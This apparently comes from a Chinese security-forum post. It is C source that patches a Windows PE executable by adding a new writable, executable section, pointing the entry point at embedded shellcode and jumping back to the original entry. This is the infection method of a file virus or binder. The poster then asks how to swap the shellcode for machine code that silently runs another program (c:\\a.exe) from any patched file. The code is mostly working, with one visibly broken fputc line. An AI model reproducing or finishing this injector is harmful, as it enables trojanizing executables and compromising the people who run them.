//???注明 By 小浩 QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
CString StrOfDWord(DWORD dwAddress)
{
unsigned char waddress[4]={0};
waddress[3]=(char)(dwAddress>>24)&0xFF;
waddress[2]=(char)(dwAddress>>16)&0xFF;
waddress[1]=(char)(dwAddress>>8 )&0xFF;
waddress[0]=(char)(dwAddress )&0xFF;
return waddress;
}
int Align(int size, int ALIGN_BASE)
{
int ret;
int result;
assert( 0 != ALIGN_BASE );
result = size % ALIGN_BASE;
if (0 != result)
{
ret = ((size / ALIGN_BASE) + 1) * ALIGN_BASE;
}
else
{
ret = size;
}
return ret;
}
void main()
{
char szFilePath[MAX_PATH]={0};
printf("Please Input FilePath:");
scanf("%s",&szFilePath);
char szFilaBak[MAX_PATH]={0};
lstrcpy(szFilaBak,szFilePath);
lstrcat(szFilaBak,".bak");
int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
if(!nRet)
{
printf("CopyFile Error!\r\n");
return;
}
FILE *pFile;
pFile=fopen(szFilePath,"rb+");
if(pFile==NULL)
{
printf("fopen Error!\r\n");
return;
}
fseek(pFile,0,SEEK_SET);
IMAGE_DOS_HEADER iMageDosHeader;
fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
IMAGE_NT_HEADERS iMageNtHeaders;
fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
printf("%d Segment\r\n",nNumOfSections);
int nFileAlignMent,nSectionAlignMent;
nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
printf("File Align Ment:%x\r\n",nFileAlignMent);
printf("Section Align Ment:%x\r\n",nSectionAlignMent);
DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
printf("File OEP:%08x\r\n",dwOldOEP);
IMAGE_SECTION_HEADER iMageSectionHeader;
for(int i=0;i<nNumOfSections;i++)
{
fread(&iMageSectionHeader,sizeof(IMAGE_SECTION_HEADER),1,pFile);
printf("Segment name:%s\r\n",iMageSectionHeader.Name);
}
IMAGE_SECTION_HEADER iMageNewSection;
memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));
strncpy((char*)iMageNewSection.Name,".x4h",strlen(".x4h"));
iMageNewSection.VirtualAddress=Align(iMageSectionHeader.VirtualAddress
+iMageSectionHeader.Misc.VirtualSize,nSectionAlignMent);
int extraLengthAfterAlign=Align(30,nFileAlignMent);
iMageNewSection.Misc.VirtualSize=Align(extraLengthAfterAlign,nSectionAlignMent);
iMageNewSection.PointerToRawData=Align(iMageSectionHeader.PointerToRawData
+iMageSectionHeader.SizeOfRawData,nFileAlignMent);
iMageNewSection.SizeOfRawData=Align(0x1000,nFileAlignMent);
iMageNewSection.Characteristics=0xE0000020;
iMageNtHeaders.FileHeader.NumberOfSections++;
iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
+0x1000,nFileAlignMent);
iMageNtHeaders.OptionalHeader.SizeOfImage=iMageNtHeaders.OptionalHeader.SizeOfImage
+Align(0x1000,nSectionAlignMent);
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;
fseek(pFile,0,SEEK_END);
fseek(pFile,iMageDosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)
+nNumOfSections*sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile);
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
fseek(pFile,0,SEEK_END);
CString szOepA;
DWORD dwAddress;
dwAddress = 0-(iMageNewSection.VirtualAddress-dwOldOEP+sizeof(szHexCode));
szOepA=StrOfDWord(dwAddress);
for(i=0;i<4;i++)
{
szHexCode[32+i]=szOepA.GetAt(i);
}
for (i=0; i<Align(0x1000,nFileAlignMent);i++)
{
fputc(0,pFile);
}
fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET);
for (i=0; i<sizeof(szHexCode);i++)
{
fputc(szHexCode,pFile);
}
fclose(pFile);
}
szHexCode 的內容是如何得到的
假如我想把szHexCode 的內容改成可以打開c:\a.exe的 那 c 下的代碼是:
#include <windows.h>
void main()
{
WinExec("c:\\a.exe",0);
}
如何把這個程式變成機器碼放進szHexCode 內呢?
ps
如何把這個程式變成機器碼放進szHexCode 內呢?
即提取這個程式那部份的機器碼 再放進szHexCode內
因為我試過把整個程式都讀成機器碼放進去是不能正常執行的!
[课程]Linux pwn 探索篇!